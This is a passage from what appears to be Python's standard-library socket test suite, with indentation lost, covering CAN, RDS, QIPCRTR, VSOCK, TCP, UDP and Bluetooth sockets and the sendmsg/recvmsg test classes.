assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@requireSocket("AF_BLUETOOTH", "SOCK_STREAM", "BTPROTO_RFCOMM")
class BasicBluetoothTest(unittest.TestCase):
def setUp(self):
self.bs = socket.socket(socket.AF_BLUETOOTH,
socket.SOCK_STREAM,
socket.BTPROTO_RFCOMM)
def tearDown(self):
self.bs.close()
def test_address_invalid(self):
addr = 'ff:ff:ff:ff:fffa'
msg = '"{addr} is not a valid address.'.format(addr=addr)
with self.assertRaisesRegex(OSError, 'bad bluetooth address', msg=msg) as cm:
self.bs.connect((addr, 1))
self.assertIsNone(cm.exception.errno, msg)
def test_address_overflow(self):
addr = '{0:x}:10:60:0:AA:08'.format(2 ** (8 * struct.calcsize('I')))
msg = '"{addr}" is not a valid address.'.format(addr=addr)
with self.assertRaisesRegex(OSError, 'bad bluetooth address', msg=msg) as cm:
self.bs.connect((addr, 3))
self.assertIsNone(cm.exception.errno, msg)
def test_address_valid(self):
addr = 'C0:10:60:AA:36:F8'
msg = '"{addr}" is a valid address.'.format(addr=addr)
with self.assertRaises(OSError, msg=msg) as cm:
self.bs.connect((addr, 1))
# valid bluetooth address, failing connection
self.assertIsNotNone(cm.exception.errno, msg)
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
